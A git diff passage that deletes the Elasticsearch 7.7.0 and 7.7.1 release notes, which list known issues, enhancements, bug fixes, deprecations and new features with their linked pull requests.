index de7ec59aa46..00000000000 --- a/docs/reference/release-notes/7.7.asciidoc +++ /dev/null @@ -1,802 +0,0 @@ -[[release-notes-7.7.1]] -== {es} version 7.7.1 - -Also see <>. - -[[known-issues-7.7.1]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[enhancement-7.7.1]] -[discrete] -=== Enhancements - -Authorization:: -* Remove synthetic role names of API keys as they confuse users {es-pull}56005[#56005] - -Features/ILM+SLM:: -* ILM: Add cluster update timeout on step retry {es-pull}54878[#54878] - -SQL:: -* Change error message for comparison against fields in filtering {es-pull}57126[#57126] (issue: {es-issue}57005[#57005]) - -[[bug-7.7.1]] -[discrete] -=== Bug fixes - -Authentication:: -* Expose idp.metadata.http.refresh for SAML realm {es-pull}56354[#56354] -* Fix concurrent refresh of tokens {es-pull}55114[#55114] (issue: {es-issue}54289[#54289]) - -CCR:: -* Retry follow task when remote connection queue full {es-pull}55314[#55314] - -Cluster Coordination:: -* Fix the problem of recovering twice when perform a full cluster restart(#55564) {es-pull}55780[#55780] (issue: {es-issue}55564[#55564]) - -Discovery-Plugins:: -* Hide c.a.a.p.i.BasicProfileConfigFileLoader noise {es-pull}56346[#56346] (issues: {es-issue}20313[#20313], {es-issue}56333[#56333]) - -Engine:: -* Ensure no circular reference in translog tragic exception {es-pull}55959[#55959] (issue: {es-issue}55893[#55893]) -* Update translog policy before the next safe commit {es-pull}54839[#54839] (issue: {es-issue}52223[#52223]) - -Features/CAT APIs:: -* Handle exceptions when building _cat/indices response {es-pull}56993[#56993] (issue: {es-issue}56816[#56816]) - -Features/Features:: -* 7.x only REST specification fixes {es-pull}56736[#56736] (issue: {es-issue}55984[#55984]) - -Features/ILM+SLM:: -* Fix Missing IgnoredUnavailable Flag in 7.x SLM Retention Task {es-pull}56616[#56616] - -Features/Indices APIs:: -* Allow removing replicas setting on closed indices {es-pull}56680[#56680] (issues: {es-issue}56656[#56656], {es-issue}56675[#56675]) -* Allow removing index.number_of_replicas setting {es-pull}56656[#56656] (issue: {es-issue}56501[#56501]) - -Features/Ingest:: -* Fix enrich coordinator to reject documents instead of deadlocking {es-pull}56247[#56247] (issue: {es-issue}55634[#55634]) -* EnrichProcessorFactory should not throw NPE if missing metadata {es-pull}55977[#55977] -* Prevent stack overflow for numerous grok patterns. {es-pull}55899[#55899] -* Fix empty_value handling in CsvProcessor {es-pull}55649[#55649] (issue: {es-issue}55643[#55643]) - -Features/Java High Level REST Client:: -* Honor IndicesOptions in HLRC putMapping request {es-pull}57118[#57118] (issue: {es-issue}57045[#57045]) - -Features/Monitoring:: -* Fix incorrect log warning when exporting monitoring via HTTP without authentication {es-pull}56958[#56958] (issue: {es-issue}56810[#56810]) -* Ensure that the monitoring export exceptions are logged. {es-pull}56237[#56237] - -Features/Watcher:: -* Ensure that .watcher-history-11* template is in installed prior to use {es-pull}56734[#56734] (issue: {es-issue}56732[#56732]) -* Fix smtp.ssl.trust setting for watcher email {es-pull}56090[#56090] (issues: {es-issue}45272[#45272], {es-issue}52153[#52153]) - -Infra/Core:: -* Prevent unexpected native controller output hanging the process {es-pull}56491[#56491] (issue: {es-issue}56366[#56366]) -* Add method to check if object is generically writeable in stream {es-pull}54936[#54936] (issue: {es-issue}54708[#54708]) - -Infra/Logging:: -* SlowLoggers using single logger {es-pull}56708[#56708] (issue: {es-issue}56171[#56171]) - -Machine Learning:: -* Fix background persistence of categorizer state. {ml-pull}1137[#1137] (issue: {ml-issue}1136[#1136]) -* Fix classification job failures when number of classes in configuration differs from the number of classes present in the training data. {ml-pull}1144[#1144] -* Fix underlying cause for "Failed to calculate splitting significance" log errors. {ml-pull}1157[#1157] -* Fix possible root cause for "Bad variance scale nan" log errors. {ml-pull}1225[#1225] -* Change data frame analytics instrumentation timestamp resolution to milliseconds. {ml-pull}1237[#1237] -* Fix "autodetect process stopped unexpectedly: Fatal error: 'terminate called after throwing an instance of 'std::bad_function_call'". {ml-pull}1246[#1246] (issue: {ml-issue}1245[#1245]) -* Fix monitoring if orphaned anomaly detector persistent tasks exist {es-pull}57235[#57235] (issue: {es-issue}51888[#51888]) -* Fix delete_expired_data/nightly maintenance when many model snapshots need deleting {es-pull}57041[#57041] (issue: {es-issue}47103[#47103]) -* Ensure class is represented when its cardinality is low {es-pull}56783[#56783] -* Use non-zero timeout when force stopping DF analytics {es-pull}56423[#56423] -* Reduce InferenceProcessor.Factory log spam by not parsing pipelines {es-pull}56020[#56020] (issue: {es-issue}55985[#55985]) -* Audit when unassigned datafeeds are stopped {es-pull}55656[#55656] (issue: {es-issue}55521[#55521]) - -Network:: -* Fix use of password protected PKCS#8 keys for SSL {es-pull}55457[#55457] (issue: {es-issue}8[#8]) -* Add support for more named curves {es-pull}55179[#55179] (issue: {es-issue}55031[#55031]) - -Recovery:: -* Fix trimUnsafeCommits for indices created before 6.2 {es-pull}57187[#57187] (issue: {es-issue}57091[#57091]) - -SQL:: -* Fix unecessary evaluation for CASE/IIF {es-pull}57159[#57159] (issue: {es-issue}49672[#49672]) -* JDBC: fix access to the Manifest for non-entry JAR URLs {es-pull}56797[#56797] (issue: {es-issue}56759[#56759]) -* Fix JDBC url pattern in docs and error message {es-pull}56612[#56612] (issue: {es-issue}56476[#56476]) -* Fix serialization of JDBC prep statement date/time params {es-pull}56492[#56492] (issue: {es-issue}56084[#56084]) -* Fix issue with date range queries and timezone {es-pull}56115[#56115] (issue: {es-issue}56049[#56049]) -* SubSelect unresolved bugfix {es-pull}55956[#55956] - -Search:: -* Don't run sort optimization on size=0 {es-pull}57044[#57044] (issue: {es-issue}56923[#56923]) -* Fix `bool` query behaviour on null value {es-pull}56817[#56817] (issue: {es-issue}56812[#56812]) -* Fix validate query listener invocation bug {es-pull}56157[#56157] -* Async Search: correct shards counting {es-pull}55758[#55758] -* For constant_keyword, make sure exists query handles missing values. {es-pull}55757[#55757] (issue: {es-issue}53545[#53545]) -* Fix (de)serialization of async search failures {es-pull}55688[#55688] -* Fix expiration time in async search response {es-pull}55435[#55435] -* Return true for can_match on idle search shards {es-pull}55428[#55428] (issues: {es-issue}27500[#27500], {es-issue}50043[#50043]) - -Snapshot/Restore:: -* Fix NPE in Partial Snapshot Without Global State {es-pull}55776[#55776] (issue: {es-issue}50234[#50234]) -* Fix Path Style Access Setting Priority {es-pull}55439[#55439] (issue: {es-issue}55407[#55407]) - -[[upgrade-7.7.1]] -[discrete] -=== Upgrades - -Infra/Core:: -* Upgrade to Jackson 2.10.4 {es-pull}56188[#56188] (issue: {es-issue}56071[#56071]) - -Infra/Packaging:: -* Upgrade bundled jdk to 14.0.1 {es-pull}57233[#57233] - -SQL:: -* Update the JLine dependency to 3.14.1 {es-pull}57111[#57111] (issue: {es-issue}57076[#57076]) - -[[release-notes-7.7.0]] -== {es} version 7.7.0 - -Also see <>. - -[[known-issues-7.7.0]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[breaking-7.7.0]] -[discrete] -=== Breaking changes - -Highlighting:: -* Highlighters skip ignored keyword values {es-pull}53408[#53408] (issue: {es-issue}43800[#43800]) - -Infra/Core:: -* Remove DEBUG-level default logging from actions {es-pull}51459[#51459] (issue: {es-issue}51198[#51198]) - -Mapping:: -* Dynamic mappings in indices created on 8.0 and later have stricter validation at mapping update time and - results in a deprecation warning for indices created in Elasticsearch 7.7.0 and later. - (e.g. incorrect analyzer settings or unknown field types). {es-pull}51233[#51233] (issues: {es-issue}17411[#17411], {es-issue}24419[#24419]) - -Search:: -* Make range query rounding consistent {es-pull}50237[#50237] (issue: {es-issue}50009[#50009]) -* Pipeline aggregation validation errors that used to return HTTP - 500s/Internal Server Errors now return 400/Bad Request {es-pull}53669[#53669]. - As a bonus we now return a list of validation errors rather than returning - the first one we encounter. - - - -[[breaking-java-7.7.0]] -[discrete] -=== Breaking Java changes - -Infra/Core:: -* Fix ActionListener.map exception handling {es-pull}50886[#50886] - -Machine Learning:: -* Add expected input field type to trained model config {es-pull}53083[#53083] - -Transform:: -* Enhance the output of preview to return full destination index details {es-pull}53572[#53572] - - - -[[deprecation-7.7.0]] -[discrete] -=== Deprecations - -Allocation:: -* Deprecated support for delaying state recovery pending master nodes {es-pull}53646[#53646] (issue: {es-issue}51806[#51806]) - -Authentication:: -* Add warnings for invalid realm order config (#51195) {es-pull}51515[#51515] -* Deprecate timeout.tcp_read AD/LDAP realm setting {es-pull}47305[#47305] (issue: {es-issue}46028[#46028]) - -Engine:: -* Deprecate translog retention settings {es-pull}51588[#51588] (issues: {es-issue}45473[#45473], {es-issue}50775[#50775]) - -Features/Features:: -* Add cluster.remote.connect to deprecation info API {es-pull}54142[#54142] (issue: {es-issue}53924[#53924]) - -Infra/Core:: -* Add deprecation check for listener thread pool {es-pull}53438[#53438] (issues: {es-issue}53049[#53049], {es-issue}53317[#53317]) -* Deprecate the logstash enabled setting {es-pull}53367[#53367] -* Deprecate the listener thread pool {es-pull}53266[#53266] (issue: {es-issue}53049[#53049]) -* Deprecate creation of dot-prefixed index names except for hidden and system indices {es-pull}49959[#49959] - -Infra/REST API:: -* Deprecate undocumented alternatives to the nodes hot threads API (#52640) {es-pull}52930[#52930] (issue: {es-issue}52640[#52640]) - -Machine Learning:: -* Renaming inference processor field field_mappings to new name field_map {es-pull}53433[#53433] - -Search:: -* Emit deprecation warning when TermsLookup contains a type {es-pull}53731[#53731] (issue: {es-issue}41059[#41059]) -* Deprecate BoolQueryBuilder's mustNot field {es-pull}53125[#53125] - - - -[[feature-7.7.0]] -[discrete] -=== New features - -Aggregations:: -* Preserve metric types in top_metrics {es-pull}53288[#53288] -* Support multiple metrics in `top_metrics` agg {es-pull}52965[#52965] (issue: {es-issue}51813[#51813]) -* Add size support to `top_metrics` {es-pull}52662[#52662] (issue: {es-issue}51813[#51813]) -* HLRC support for string_stats {es-pull}52163[#52163] -* Add Boxplot Aggregation {es-pull}51948[#51948] (issue: {es-issue}33112[#33112]) - -Analysis:: -* Add nori_number token filter in analysis-nori {es-pull}53583[#53583] - -Authentication:: -* Create API Key on behalf of other user {es-pull}52886[#52886] (issue: {es-issue}48716[#48716]) - -Geo:: -* Add support for distance queries on shape queries {es-pull}53468[#53468] -* Add support for distance queries on geo_shape queries {es-pull}53466[#53466] (issues: {es-issue}13351[#13351], {es-issue}39237[#39237]) -* Add support for multipoint shape queries {es-pull}52564[#52564] (issue: {es-issue}52133[#52133]) -* Add support for multipoint geoshape queries {es-pull}52133[#52133] (issue: {es-issue}37318[#37318]) - -Infra/Core:: -* Implement hidden indices {es-pull}50452[#50452] (issues: {es-issue}50251[#50251], {es-issue}50665[#50665], {es-issue}50762[#50762]) - -Infra/Packaging:: -* Introduce aarch64 packaging {es-pull}53914[#53914] - -Machine Learning:: -* Implement ILM policy for .ml-state* indices {es-pull}52356[#52356] (issue: {es-issue}29938[#29938]) -* Add instrumentation to report statistics related to {dfanalytics-jobs} such as -progress, memory usage, etc. {ml-pull}906[#906] -* Multiclass classification {ml-pull}1037[#1037] - -Mapping:: -* Introduce a `constant_keyword` field. {es-pull}49713[#49713] - -SQL:: -* Add `constant_keyword` support {es-pull}53241[#53241] (issue: {es-issue}53016[#53016]) -* Add optimisations for not-equalities {es-pull}51088[#51088] (issue: {es-issue}49637[#49637]) -* Add support for passing query parameters in REST API calls {es-pull}51029[#51029] (issue: {es-issue}42916[#42916]) - -Search:: -* Add a cluster setting to disallow expensive queries {es-pull}51385[#51385] (issue: {es-issue}29050[#29050]) -* Add new x-pack endpoints to track the progress of a search asynchronously {es-pull}49931[#49931] (issue: {es-issue}49091[#49091]) - - - -[[enhancement-7.7.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Fixed rewrite of time zone without DST {es-pull}54398[#54398] -* Try to save memory on aggregations {es-pull}53793[#53793] -* Speed up partial reduce of terms aggregations {es-pull}53216[#53216] (issue: {es-issue}51857[#51857]) -* Simplify SiblingPipelineAggregator {es-pull}53144[#53144] -* Add histogram field type support to boxplot aggs {es-pull}52265[#52265] (issues: {es-issue}33112[#33112], {es-issue}52233[#52233]) -* Percentiles aggregation validation checks for range {es-pull}51871[#51871] (issue: {es-issue}51808[#51808]) -* Begin moving date_histogram to offset rounding (take two) {es-pull}51271[#51271] (issues: {es-issue}50609[#50609], {es-issue}50873[#50873]) -* Password-protected Keystore Feature Branch PR {es-pull}51123[#51123] (issues: {es-issue}32691[#32691], {es-issue}49340[#49340]) -* Implement top_metrics agg {es-pull}51155[#51155] (issue: {es-issue}48069[#48069]) -* Bucket aggregation circuit breaker optimization. {es-pull}46751[#46751] - -Analysis:: -* Removes old Lucene's experimental flag from analyzer documentations {es-pull}53217[#53217] - -Authentication:: -* Add exception metadata for disabled features {es-pull}52811[#52811] (issues: {es-issue}47759[#47759], {es-issue}52311[#52311], {es-issue}55255[#55255]) -* Validate role templates before saving role mapping {es-pull}52636[#52636] (issue: {es-issue}48773[#48773]) -* Add support for secondary authentication {es-pull}52093[#52093] -* Expose API key name to the ingest pipeline {es-pull}51305[#51305] (issues: {es-issue}46847[#46847], {es-issue}49106[#49106]) -* Disallow Password Change when authenticated by Token {es-pull}49694[#49694] (issue: {es-issue}48752[#48752]) - -Authorization:: -* Allow kibana_system to create and invalidate API keys on behalf of other users {es-pull}53824[#53824] (issue: {es-issue}48716[#48716]) -* Add "grant_api_key" cluster privilege {es-pull}53527[#53527] (issues: {es-issue}48716[#48716], {es-issue}52886[#52886]) -* Giving kibana user privileges to create custom link index {es-pull}53221[#53221] (issue: {es-issue}59305[#59305]) -* Allow kibana to collect APM telemetry in background task {es-pull}52917[#52917] (issue: {es-issue}50757[#50757]) -* Add the new 'maintenance' privilege containing 4 actions (#29998) {es-pull}50643[#50643] - -Cluster Coordination:: -* Describe STALE_STATE_CONFIG in ClusterFormationFH {es-pull}53878[#53878] (issue: {es-issue}53734[#53734]) - -Distributed:: -* Introduce formal role for remote cluster client {es-pull}53924[#53924] -* Shortcut query phase using the results of other shards {es-pull}51852[#51852] (issues: {es-issue}49601[#49601], {es-issue}51708[#51708]) -* Flush instead of synced-flush inactive shards {es-pull}49126[#49126] (issues: {es-issue}31965[#31965], {es-issue}48430[#48430]) - -Engine:: -* Restore off-heap loading for term dictionary in ReadOnlyEngine {es-pull}53713[#53713] (issues: {es-issue}43158[#43158], {es-issue}51247[#51247]) -* Separate translog from index deletion conditions {es-pull}52556[#52556] -* Always rewrite search shard request outside of the search thread pool {es-pull}51708[#51708] (issue: {es-issue}49601[#49601]) -* Move the terms index of `_id` off-heap. {es-pull}52405[#52405] (issue: {es-issue}42838[#42838]) -* Cache completion stats between refreshes {es-pull}51991[#51991] (issue: {es-issue}51915[#51915]) -* Use local checkpoint to calculate min translog gen for recovery {es-pull}51905[#51905] (issue: {es-issue}49970[#49970]) - -Features/CAT APIs:: -* /_cat/shards support path stats {es-pull}53461[#53461] -* Allow _cat indices & aliases to use indices options {es-pull}53248[#53248] (issue: {es-issue}52304[#52304]) - -Features/Features:: -* Enable deprecation checks for removed settings {es-pull}53317[#53317] - -Features/ILM+SLM:: -* Use Priority.IMMEDIATE for stop ILM cluster update {es-pull}54909[#54909] -* Add cluster update timeout on step retry {es-pull}54878[#54878] -* Hide ILM & SLM history aliases {es-pull}53564[#53564] -* Avoid race condition in ILMHistorySotre {es-pull}53039[#53039] (issues: {es-issue}50353[#50353], {es-issue}52853[#52853]) -* Make FreezeStep retryable {es-pull}52540[#52540] -* Make DeleteStep retryable {es-pull}52494[#52494] -* Allow forcemerge in the hot phase for ILM policies {es-pull}52073[#52073] (issue: {es-issue}43165[#43165]) -* Stop policy on last PhaseCompleteStep instead of TerminalPolicyStep {es-pull}51631[#51631] (issue: {es-issue}48431[#48431]) -* Convert ILM and SLM histories into hidden indices {es-pull}51456[#51456] -* Make UpdateSettingsStep retryable {es-pull}51235[#51235] (issues: {es-issue}44135[#44135], {es-issue}48183[#48183]) -* Expose master timeout for ILM actions {es-pull}51130[#51130] (issue: {es-issue}44136[#44136]) -* Wait for active shards on rolled index in a separate step {es-pull}50718[#50718] (issues: {es-issue}44135[#44135], {es-issue}48183[#48183]) -* Adding best_compression {es-pull}49974[#49974] - -Features/Indices APIs:: -* Add IndexTemplateV2 to MetaData {es-pull}53753[#53753] (issue: {es-issue}53101[#53101]) -* Add ComponentTemplate to MetaData {es-pull}53290[#53290] (issue: {es-issue}53101[#53101]) - -Features/Ingest:: -* Reduce log level for pipeline failure {es-pull}54097[#54097] (issue: {es-issue}51459[#51459]) -* Support array for all string ingest processors {es-pull}53343[#53343] (issue: {es-issue}51087[#51087]) -* Add empty_value parameter to CSV processor {es-pull}51567[#51567] -* Add pipeline name to ingest metadata {es-pull}50467[#50467] (issue: {es-issue}42106[#42106]) - -Features/Java High Level REST Client:: -* SourceExists HLRC uses GetSourceRequest instead of GetRequest {es-pull}51789[#51789] (issue: {es-issue}50885[#50885]) -* Add async_search.submit to HLRC {es-pull}53592[#53592] (issue: {es-issue}49091[#49091]) -* Add Get Source API to the HLRC {es-pull}50885[#50885] (issue: {es-issue}47678[#47678]) - -Features/Monitoring:: -* Secure password for monitoring HTTP exporter {es-pull}50919[#50919] (issue: {es-issue}50197[#50197]) -* Validate SSL settings at parse time {es-pull}49196[#49196] (issue: {es-issue}47711[#47711]) - -Features/Watcher:: -* Make watch history indices hidden {es-pull}52962[#52962] (issue: {es-issue}50251[#50251]) -* Upgrade to the latest OWASP HTML sanitizer {es-pull}50765[#50765] (issue: {es-issue}50395[#50395]) - -Infra/Core:: -* Enable helpful null pointer exceptions {es-pull}54853[#54853] -* Allow keystore add to handle multiple settings {es-pull}54229[#54229] (issue: {es-issue}54191[#54191]) -* Report parser name and location in XContent deprecation warnings {es-pull}53805[#53805] -* Report parser name and location in XContent deprecation warnings {es-pull}53752[#53752] -* Deprecate all variants of a ParseField with no replacement {es-pull}53722[#53722] -* Allow specifying an exclusive set of fields on ObjectParser {es-pull}52893[#52893] -* Support joda style date patterns in 7.x {es-pull}52555[#52555] -* Implement hidden aliases {es-pull}52547[#52547] (issue: {es-issue}52304[#52304]) -* Allow ObjectParsers to specify required sets of fields {es-pull}49661[#49661] (issue: {es-issue}48824[#48824]) - -Infra/Logging:: -* Capture stdout and stderr to log4j log {es-pull}50259[#50259] (issue: {es-issue}50156[#50156]) - -Infra/Packaging:: -* Use AdoptOpenJDK API to Download JDKs {es-pull}55127[#55127] (issue: {es-issue}55125[#55125]) -* Introduce aarch64 Docker image {es-pull}53936[#53936] (issue: {es-issue}53914[#53914]) -* Introduce jvm.options.d for customizing JVM options {es-pull}51882[#51882] (issue: {es-issue}51626[#51626]) - -Infra/Plugins:: -* Allow sha512 checksum without filename for maven plugins {es-pull}52668[#52668] (issue: {es-issue}52413[#52413]) - -Infra/Scripting:: -* Scripting: Context script cache unlimited compile {es-pull}53769[#53769] (issue: {es-issue}50152[#50152]) -* Scripting: Increase ingest script cache defaults {es-pull}53765[#53765] (issue: {es-issue}50152[#50152]) -* Scripting: Per-context script cache, default off (#52855) {es-pull}53756[#53756] (issues: {es-issue}50152[#50152], {es-issue}52855[#52855]) -* Scripting: Per-context script cache, default off {es-pull}52855[#52855] (issue: {es-issue}50152[#50152]) -* Improve Painless compilation performance for nested conditionals {es-pull}52056[#52056] -* Scripting: Add char position of script errors {es-pull}51069[#51069] (issue: {es-issue}50993[#50993]) - -Infra/Settings:: -* Allow keystore add-file to handle multiple settings {es-pull}54240[#54240] (issue: {es-issue}54191[#54191]) -* Settings: AffixSettings as validator dependencies {es-pull}52973[#52973] (issue: {es-issue}52933[#52933]) - -License:: -* Simplify ml license checking with XpackLicenseState internals {es-pull}52684[#52684] (issue: {es-issue}52115[#52115]) -* License removal leads back to a basic license {es-pull}52407[#52407] (issue: {es-issue}45022[#45022]) -* Refactor license checking {es-pull}52118[#52118] (issue: {es-issue}51864[#51864]) -* Add enterprise mode and refactor {es-pull}51864[#51864] (issue: {es-issue}51081[#51081]) - -Machine Learning:: -* Stratified cross validation split for classification {es-pull}54087[#54087] -* Data frame analytics data counts {es-pull}53998[#53998] -* Verify that the field is aggregatable before attempting cardinality aggregation {es-pull}53874[#53874] (issue: {es-issue}53876[#53876]) -* Adds multi-class feature importance support {es-pull}53803[#53803] -* Data frame analytics analysis stats {es-pull}53788[#53788] -* Add a model memory estimation endpoint for anomaly detection {es-pull}53507[#53507] (issue: {es-issue}53219[#53219]) -* Adds new default_field_map field to trained models {es-pull}53294[#53294] -* Improve DF analytics audits and logging {es-pull}53179[#53179] -* Add indices_options to datafeed config and update {es-pull}52793[#52793] (issue: {es-issue}48056[#48056]) -* Parse and report memory usage for DF Analytics {es-pull}52778[#52778] -* Adds the class_assignment_objective parameter to classification {es-pull}52763[#52763] (issue: {es-issue}52427[#52427]) -* Add reason to DataFrameAnalyticsTask updateState log message {es-pull}52659[#52659] (issue: {es-issue}52654[#52654]) -* Add support for multi-value leaves to the tree model {es-pull}52531[#52531] -* Make ml internal indices hidden {es-pull}52423[#52423] (issue: {es-issue}52420[#52420]) -* Add _cat/ml/data_frame/analytics API {es-pull}52260[#52260] (issue: {es-issue}51413[#51413]) -* Adds feature importance option to inference processor {es-pull}52218[#52218] -* Switch poor categorization audit warning to use status field {es-pull}52195[#52195] (issues: {es-issue}50749[#50749], {es-issue}51146[#51146], {es-issue}51879[#51879]) -* Retry persisting DF Analytics results {es-pull}52048[#52048] -* Improve multiline_start_pattern for CSV in find_file_structure {es-pull}51737[#51737] -* Add _cat/ml/trained_models API {es-pull}51529[#51529] (issue: {es-issue}51414[#51414]) -* Add GET _cat/ml/datafeeds {es-pull}51500[#51500] (issue: {es-issue}51411[#51411]) -* Use CSV ingest processor in find_file_structure ingest pipeline {es-pull}51492[#51492] (issue: {es-issue}56038[#56038]) -* Add _cat/ml/anomaly_detectors API {es-pull}51364[#51364] -* Add tags url param to GET {es-pull}51330[#51330] -* Add parsers for inference configuration classes {es-pull}51300[#51300] -* Make datafeeds work with nanosecond time fields {es-pull}51180[#51180] (issue: {es-issue}49889[#49889]) -* Adds support for a global calendars {es-pull}50372[#50372] (issue: {es-issue}45013[#45013]) -* Speed up computation of feature importance -{ml-pull}1005[1005] -* Improve initialization of learn rate for better and more stable results in -regression and classification {ml-pull}948[#948] -* Add number of processed training samples to the definition of decision tree -nodes {ml-pull}991[#991] -* Add new model_size_stats fields to instrument categorization -{ml-pull}948[#948], {es-pull}51879[#51879] (issue: {es-issue}50794[#50749]) -* Improve upfront memory estimation for all data frame analyses, which were -higher than necessary. This will improve the allocation of data frame analyses -to cluster nodes {ml-pull}1003[#1003] -* Upgrade the compiler used on Linux from gcc 7.3 to gcc 7.5, and the binutils -used in the build from version 2.20 to 2.34 {ml-pull}1013[#1013] -* Add instrumentation of the peak memory consumption for {dfanalytics-jobs} -{ml-pull}1022[#1022] -* Remove all memory overheads for computing tree SHAP values {ml-pull}1023[#1023] -* Distinguish between empty and missing categorical fields in classification and -regression model training {ml-pull}1034[#1034] -* Add instrumentation information for supervised learning {dfanalytics-jobs} -{ml-pull}1031[#1031] -* Add instrumentation information for {oldetection} data frame analytics jobs -{ml-pull}1068[#1068] -* Write out feature importance for multi-class models {ml-pull}1071[#1071] -* Enable system call filtering to the native process used with {dfanalytics} -{ml-pull}1098[#1098] - -Mapping:: -* Wildcard field - add normalizer support {es-pull}53851[#53851] -* Append index name for the source of the cluster put-mapping task {es-pull}52690[#52690] - -Network:: -* Give helpful message on remote connections disabled {es-pull}53690[#53690] -* Add server name to remote info API {es-pull}53634[#53634] -* Log when probe succeeds but full connection fails {es-pull}51304[#51304] -* Encrypt generated key with AES {es-pull}51019[#51019] (issue: {es-issue}50843[#50843]) - -Ranking:: -* Adds recall@k metric to rank eval API {es-pull}52577[#52577] (issue: {es-issue}51676[#51676]) - -SQL:: -* JDBC debugging enhancement {es-pull}53880[#53880] -* Transfer version compatibility decision to the server {es-pull}53082[#53082] (issue: {es-issue}52766[#52766]) -* Use a proper error message for queries directed at empty mapping indices {es-pull}52967[#52967] (issue: {es-issue}52865[#52865]) -* Use calendar_interval of 1d for HISTOGRAMs with 1 DAY intervals {es-pull}52749[#52749] (issue: {es-issue}52713[#52713]) -* Use a calendar interval for histograms over 1 month intervals {es-pull}52586[#52586] (issue: {es-issue}51538[#51538]) -* Make parsing of date more lenient {es-pull}52137[#52137] (issue: {es-issue}49379[#49379]) -* Enhance timestamp escaped literal parsing {es-pull}52097[#52097] (issue: {es-issue}46069[#46069]) -* Handle uberjar scenario where the ES jdbc driver file is bundled in another jar {es-pull}51856[#51856] (issue: {es-issue}50201[#50201]) -* Verify Full-Text Search functions not allowed in SELECT {es-pull}51568[#51568] (issue: {es-issue}47446[#47446]) -* Extend the optimisations for equalities {es-pull}50792[#50792] (issue: {es-issue}49637[#49637]) -* Add trace logging for search responses coming from server {es-pull}50530[#50530] -* Extend DATE_TRUNC to also operate on intervals(elastic - #46632 ) {es-pull}47720[#47720] (issue: {es-issue}46632[#46632]) - -Search:: -* HLRC: Don't send defaults for SubmitAsyncSearchRequest {es-pull}54200[#54200] -* Reduce performance impact of ExitableDirectoryReader {es-pull}53978[#53978] (issues: {es-issue}52822[#52822], {es-issue}53166[#53166], {es-issue}53496[#53496]) -* Add heuristics to compute pre_filter_shard_size when unspecified {es-pull}53873[#53873] (issue: {es-issue}39835[#39835]) -* Add async_search get and delete APIs to HLRC {es-pull}53828[#53828] (issue: {es-issue}49091[#49091]) -* Increase step between checks for cancellation {es-pull}53712[#53712] (issues: {es-issue}52822[#52822], {es-issue}53496[#53496]) -* Refine SearchProgressListener internal API {es-pull}53373[#53373] -* Check for query cancellation during rewrite {es-pull}53166[#53166] (issue: {es-issue}52822[#52822]) -* Implement Cancellable DirectoryReader {es-pull}52822[#52822] -* Address MinAndMax generics warnings {es-pull}52642[#52642] (issue: {es-issue}49092[#49092]) -* Clarify when shard iterators get sorted {es-pull}52633[#52633] -* Generalize how queries on `_index` are handled at rewrite time {es-pull}52486[#52486] (issues: {es-issue}49254[#49254], {es-issue}49713[#49713]) -* Remove the query builder serialization from QueryShardException message {es-pull}51885[#51885] (issues: {es-issue}48910[#48910], {es-issue}51843[#51843]) -* Short circuited to MatchNone for non-participating slice {es-pull}51207[#51207] -* Add "did you mean" to unknown queries {es-pull}51177[#51177] -* Exclude unmapped fields during max clause limit checking for querying {es-pull}49523[#49523] (issue: {es-issue}49002[#49002]) - -Security:: -* Add error message in JSON response {es-pull}54389[#54389] - -Snapshot/Restore:: -* Use Azure Bulk Deletes in Azure Repository {es-pull}53919[#53919] (issue: {es-issue}53865[#53865]) -* Only link fd* files during source-only snapshot {es-pull}53463[#53463] (issue: {es-issue}50231[#50231]) -* Add Blob Download Retries to GCS Repository {es-pull}52479[#52479] (issues: {es-issue}46589[#46589], {es-issue}52319[#52319]) -* Better Incrementality for Snapshots of Unchanged Shards {es-pull}52182[#52182] -* Add Region and Signer Algorithm Overrides to S3 Repos {es-pull}52112[#52112] (issue: {es-issue}51861[#51861]) -* Allow Parallel Snapshot Restore And Delete {es-pull}51608[#51608] (issue: {es-issue}41463[#41463]) - -Store:: -* HybridDirectory should mmap postings. {es-pull}52641[#52641] - -Transform:: -* Transition Transforms to using hidden indices for notifcations index {es-pull}53773[#53773] (issue: {es-issue}53762[#53762]) -* Add processing stats to record the time spent for processing results {es-pull}53770[#53770] -* Create GET _cat/transforms API Issue {es-pull}53643[#53643] (issue: {es-issue}51412[#51412]) -* Add support for script in group_by {es-pull}53167[#53167] (issue: {es-issue}43152[#43152]) -* Implement node.transform to control where to run a transform {es-pull}52712[#52712] (issues: {es-issue}48734[#48734], {es-issue}50033[#50033], {es-issue}52200[#52200]) -* Add support for filter aggregation {es-pull}52483[#52483] (issue: {es-issue}52151[#52151]) -* Provide exponential_avg* stats for batch transforms {es-pull}52041[#52041] (issue: {es-issue}52037[#52037]) -* Improve irrecoverable error detection - part 2 {es-pull}52003[#52003] (issue: {es-issue}51820[#51820]) -* Mark transform API's stable {es-pull}51862[#51862] -* Improve irrecoverable error detection {es-pull}51820[#51820] (issue: {es-issue}50135[#50135]) -* Add support for percentile aggs {es-pull}51808[#51808] (issue: {es-issue}51663[#51663]) -* Disallow fieldnames with a dot at start and/or end {es-pull}51369[#51369] -* Avoid mapping problems with index templates {es-pull}51368[#51368] (issue: {es-issue}51321[#51321]) -* Handle permanent bulk indexing errors {es-pull}51307[#51307] (issue: {es-issue}50122[#50122]) -* Improve force stop robustness in case of an error {es-pull}51072[#51072] - - - -[[bug-7.7.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix date_nanos in composite aggs {es-pull}53315[#53315] (issue: {es-issue}53168[#53168]) -* Fix composite agg sort bug {es-pull}53296[#53296] (issue: {es-issue}52480[#52480]) -* Decode max and min optimization more carefully {es-pull}52336[#52336] (issue: {es-issue}52220[#52220]) -* Fix a DST error in date_histogram {es-pull}52016[#52016] (issue: {es-issue}50265[#50265]) -* Use #name() instead of #simpleName() when generating doc values {es-pull}51920[#51920] (issues: {es-issue}50307[#50307], {es-issue}51847[#51847]) -* Fix a sneaky bug in rare_terms {es-pull}51868[#51868] (issue: 